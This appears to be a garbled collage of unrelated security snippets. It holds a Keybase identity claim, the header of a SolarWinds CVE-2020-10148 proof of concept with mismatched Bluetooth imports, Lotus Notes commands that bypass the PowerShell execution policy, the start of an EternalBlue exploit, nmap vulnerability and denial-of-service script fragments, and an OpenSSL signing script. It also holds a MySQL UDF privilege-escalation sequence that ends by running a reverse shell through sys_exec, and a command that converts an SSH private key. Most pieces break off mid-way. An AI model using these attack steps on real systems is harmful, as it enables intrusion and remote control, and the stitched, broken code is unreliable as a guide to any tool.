I hereby claim:
- I am shaheemirza on github.
- I am shaheemirza (https://keybase.io/shaheemirza) on keybase.
- I have a public key ASBTxO-YmsRzRF9C1e7DfUKX7EMIPJui-OwN0ml7-w7DXgo
To claim this, I am signing this object:
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# @0xSha
# (C) 2020 0xSha.io
# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules

import os
import sys
import time
import struct
import select
import binascii
import bluetooth
from bluetooth import _bluetooth as bt

"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Hashes of each binary (prepare for onslaught of md5 naysayers):
Notes.exe — 8f633ef1e1147637c25dd917909cd361
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126

#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)

local smb = require "smb"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
description = [[
Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code
execution vulnerability (ms17-010).
The script connects to the $IPC tree, executes a transaction on FID 0 and

description=[[
CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL.
Warning: This WILL cause DoS on vulnerable mysql machines.
Thanks: SECWORKS, hackers.mu team.
]]
---
--@usage nmap -sU -p <portnum> --script mysql-vuln-cve2017-3599 --script-args mysql-vuln-cve2017-3599.ports=<ports> <target>
--@output
--PORT STATE SERVICE

#!/bin/bash
# Sign a file with a private key using OpenSSL
# Encode the signature in Base64 format
#
# Usage: sign <file> <private_key>
#
# NOTE: to generate a public/private key use the following commands:
#
# openssl genrsa -aes128 -passout pass:<passphrase> -out private.pem 2048
# openssl rsa -in private.pem -passin pass:<passphrase> -pubout -out public.pem

# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');

openssl rsa -in ~/.ssh/id_rsa -outform pem > id_rsa.pem
chmod 700 id_rsa.pem